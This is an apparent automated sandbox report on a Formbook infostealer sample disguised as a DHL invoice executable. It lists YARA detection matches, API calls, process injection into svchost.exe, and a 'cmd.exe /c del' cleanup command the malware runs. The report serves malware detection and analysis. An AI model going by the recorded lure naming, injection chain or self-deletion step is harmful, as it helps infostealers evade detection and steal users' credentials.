Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@13/5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B37B5 GetLastError,FormatMessageW,

0_2_012B37B5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A10BF AdjustTokenPrivileges,CloseHandle,		0_2_012A10BF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_012A16C3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_012B51CD

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_012CA67C

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_012B648E

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_012442A2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\Temp\aut6C1C.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.v.c.h.o.s.t...e.x.e...........................B.......<.!.......!.....			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................H.!.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$.s............,.!.............................&.................!.....			Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: van.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BF754AA-C967-445C-AB3D-D8FDA9BAE7EF}\InProcServer32

Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static file information: File size 1120256 > 1048576

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01260A76 push ecx; ret	0_2_01260A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004191ED push ecx; iretd	2_2_004191EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040F365 pushad ; ret	2_2_0040F36D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418389 push esp; iretd	2_2_0041838B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004164DA push edi; retf	2_2_004164FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4F2 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4FB push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4A5 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D55C push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407726 push esp; iretd	2_2_00407729
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073DFA1 push ecx; ret	2_2_0073DFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038E9B5 push esp; retn 0000h	2_2_0038EAE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038EB1E push esp; retn 0000h	2_2_0038EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038EB02 push esp; retn 0000h	2_2_0038EB03
